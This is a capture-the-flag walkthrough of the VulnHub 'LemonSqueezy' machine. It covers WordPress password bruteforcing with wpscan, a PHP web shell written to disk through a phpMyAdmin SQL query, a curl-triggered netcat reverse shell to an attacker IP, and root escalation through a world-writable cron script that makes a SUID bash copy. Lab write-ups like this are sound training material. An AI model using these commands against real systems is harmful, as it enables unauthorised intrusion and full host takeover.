Difficulty Release Date Author Machine link
Beginner 26 Apr 2020 James Hay https://vulnhub.com/entry/lemonsqueezy-1,473/

Summary

For this box we only get one port running a web server and we discover wordpress and phpmyadmin by directory bruteforcing. On the wordpress application we bruteforce credentials of the users discovered and then discover more credentials stored in a draft post. With this new credentials we access phpmyadmin and write to a file using an sql query. This serves as our initial foothold and we then escalate privileges by abusing a cron job running as root that executes a world writeable script.

Reconnaissance

Nmap

Nmap scan report for 192.168.191.134
Host is up (0.00014s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:FF:26:DE (VMware)

Enumeration

80 (HTTP)

Visiting this page on the browser only serves the apache default page, confirming what nmap found in title.

After performing a directory bruteforce using ffuf we get the following directories:

ffuf -ic -c -u 'http://192.168.191.134/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 50

Checking the /wordpress directory, we see a basic wordpress site with not much information.

Performing enumeration using wpscan, the only interesting information gathered is the usernames.

wpscan --url http://lemonsqueezy/wordpress -e ap,at,tt,cb,dbe,u -o wpscan.out --api-token

Bruteforcing the credentials for each user, we discover the password of the orange user.

wpscan --url http://lemonsqueezy/wordpress -U orange -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt

After logging into wordpress with the discovered credentials orange:ginger, we find another password in drafts.

With this password, we are able to login to phpmyadmin as the orange user.

Successful login:

By logging in we can abuse this access by writing a file to disk that contains php by using an sql statement.

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php" 

We can then verify that we have successful command execution, by running the whoami command.

Shell as www-data

Running the below curl command we are able to get a reverse shell:

curl "http://192.168.191.134/wordpress/shell.php?cmd=nc+-e+/bin/bash+192.168.191.1+9000+%26"

After performing some manual local enumeration, we discover a cron job running as root.

The script being executed in the cron job is world writeable and the www-data user can write to it.

Shell as root

After changing the script to the below command we can create a bash binary with suid permissions.

#!/bin/bash
cp /bin/bash /suidbash
chmod u+s /suidbash

Once the cron is executed we get the binary and can escalate to root shell and read root.txt.

./suidbash -p

Extras

  • It seems I forgot user.txt and it is in /var/www.
  • We could write to the wordpress folder from phpmyadmin because it was world-writeable.